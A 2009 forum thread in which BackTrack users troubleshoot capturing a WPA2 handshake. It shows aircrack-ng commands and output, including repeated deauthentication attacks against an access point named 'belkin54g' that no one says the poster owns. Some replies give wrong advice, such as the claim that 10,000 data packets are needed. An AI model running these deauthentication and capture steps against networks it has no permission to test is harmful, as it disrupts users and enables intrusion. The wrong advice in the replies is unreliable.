Cant capture handshake

[roxxor]

Hi all,

Im currently on backtrack 4 installed on my hdd.
i have been trying for 2 days now to get a handshake.

my steps :

Code:

root@bt:~# airmon-ng start wlan0


Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e
PID     Name
3981    knetworkmanager
4025    dhclient


Interface       Chipset         Driver

eth1            Intel 2100B     ipw2100
wlan0           Broadcom        b43 - [phy0]
                                (monitor mode enabled on mon0)

airmon-ng wlan0

Code:

 CH  1 ][ Elapsed: 28 s ][ 2009-06-19 10:01

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:12:BF:F8:3D:02  -83       14        0    0   1  54 . WPA  TKIP   PSK  SNV6520f83d00
 00:17:3F:B7:B1:3E  -87        2        0    0  11  54   WPA2 CCMP   PSK  belkin54g

 BSSID              STATION            PWR   Rate   Lost  Packets  Probe

root@bt:~# airodump-ng -w WPA -c 11 --bssid 00:17:3F:B7:B1:3E wlan0

Code:

 CH 11 ][ Elapsed: 20 s ][ 2009-06-19 10:03

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:17:3F:B7:B1:3E  -86  54       79        0    0  11  54   WPA2 CCMP   PSK  belkin54g

 BSSID              STATION            PWR   Rate   Lost  Packets  Probe

Code:

root@bt:~# aireplay-ng -0 10 -a 00:17:3F:B7:B1:3E wlan0
10:05:47  Waiting for beacon frame (BSSID: 00:17:3F:B7:B1:3E) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
10:05:47  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
10:05:48  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
10:05:49  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
10:05:49  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
10:05:50  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
10:05:51  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
10:05:51  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
10:05:52  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
10:05:53  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
10:05:54  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]

and no handshake , i know injection works

Code:

root@bt:~# aireplay-ng -9 -a 00:17:3F:B7:B1:3E wlan0
For information, no action required: Using gettimeofday() instead of /dev/rtc
10:06:57  Waiting for beacon frame (BSSID: 00:17:3F:B7:B1:3E) on channel 11
10:07:04  Trying broadcast probe requests...
10:07:05  Injection is working!
10:07:06  Found 1 AP

10:07:06  Trying directed probe requests...
10:07:06  00:17:3F:B7:B1:3E - channel: 11 - 'belkin54g'
10:07:10  Ping (min/avg/max): 3.199ms/18.740ms/50.933ms Power: -85.86
10:07:10  30/30:  100%

What am i missing ?

[sbolen28]

Code:

 CH 11 ][ Elapsed: 20 s ][ 2009-06-19 10:03

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:17:3F:B7:B1:3E  -86  54       79        0    0  11  54   WPA2 CCMP   PSK  belkin54g

 BSSID              STATION            PWR   Rate   Lost  Packets  Probe

You need to let the #data go up to 10k

it should be to atleast 10000 before even trying to get a handshake

The #data, will go up as the user is on the web

Also,
Not sure if it matters but this line is in the wrong order

root@bt:~# airodump-ng -w WPA -c 11 --bssid 00:17:3F:B7:B1:3E wlan0

Should be

airodump-ng -c 11 -w WPA --bssid 00:17:3F:B7:B1:3E wlan0

PS. If you wait for the #data to get to 10k I can almost guarantee that you will get the handshake.

Let me know!

Sean

[imported_vvpalin]

Your using a broadcom, and that has so many bugs its not even funny.

Get a better card and try again, also the last thing you posted doesn't prove injection is working at all.


@sbolen28 - I'm hoping you misread his post, if not you need to do some homework

cheers

[sbolen28]

I didnt missread, IM totally new to BT also.

I had the same problem with the handshake, and noticed the data was 0 so thought that was his problem.

[roxxor]

thx for the reply's !

The data isnt the problem , tryed to get a handshake with 10 000 packets earlyer.
A new card isnt a option for the moment , maybe later.
I did some good reading (i hope) , and found out no clients are connected to the AP.
I think this is a problem with my wlan card , cause there is a AP , generating packets like a mofo , without any clients connected ( according to my card )
but on the other site , i have a build in IWP2100 , witch normaly can monitor but he doesnt show any clients either , i have like 5 AP's floating around , and like never any associated clients.. somthings wrong

[kazalku]

Hi all,

Im currently on backtrack 4 installed on my hdd.
i have been trying for 2 days now to get a handshake.

my steps :

Code:

root@bt:~# airmon-ng start wlan0


Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e
PID     Name
3981    knetworkmanager
4025    dhclient


Interface       Chipset         Driver

eth1            Intel 2100B     ipw2100
wlan0           Broadcom        b43 - [phy0]
                                (monitor mode enabled on mon0)

airmon-ng wlan0

Code:

 CH  1 ][ Elapsed: 28 s ][ 2009-06-19 10:01

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:12:BF:F8:3D:02  -83       14        0    0   1  54 . WPA  TKIP   PSK  SNV6520f83d00
 00:17:3F:B7:B1:3E  -87        2        0    0  11  54   WPA2 CCMP   PSK  belkin54g

 BSSID              STATION            PWR   Rate   Lost  Packets  Probe

root@bt:~# airodump-ng -w WPA -c 11 --bssid 00:17:3F:B7:B1:3E wlan0

Code:

 CH 11 ][ Elapsed: 20 s ][ 2009-06-19 10:03

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:17:3F:B7:B1:3E  -86  54       79        0    0  11  54   WPA2 CCMP   PSK  belkin54g

 BSSID              STATION            PWR   Rate   Lost  Packets  Probe

Code:

root@bt:~# aireplay-ng -0 10 -a 00:17:3F:B7:B1:3E wlan0
10:05:47  Waiting for beacon frame (BSSID: 00:17:3F:B7:B1:3E) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
10:05:47  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
10:05:48  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
10:05:49  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
10:05:49  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
10:05:50  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
10:05:51  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
10:05:51  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
10:05:52  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
10:05:53  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
10:05:54  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]

and no handshake , i know injection works

Code:

root@bt:~# aireplay-ng -9 -a 00:17:3F:B7:B1:3E wlan0
For information, no action required: Using gettimeofday() instead of /dev/rtc
10:06:57  Waiting for beacon frame (BSSID: 00:17:3F:B7:B1:3E) on channel 11
10:07:04  Trying broadcast probe requests...
10:07:05  Injection is working!
10:07:06  Found 1 AP

10:07:06  Trying directed probe requests...
10:07:06  00:17:3F:B7:B1:3E - channel: 11 - 'belkin54g'
10:07:10  Ping (min/avg/max): 3.199ms/18.740ms/50.933ms Power: -85.86
10:07:10  30/30:  100%

What am i missing ?

Let's start from the beginning, should we?

Have a look at the RED letters in your post. Few points, you should:
1) Connect a client, then deauth it (with -1 attack) to get a handshake.
2) Use mon0 as your interface instead of wlan0 after you enable the monitor mode. So, airmon-ng start wlan0 is correct but after this step, use mon0 in all other commands.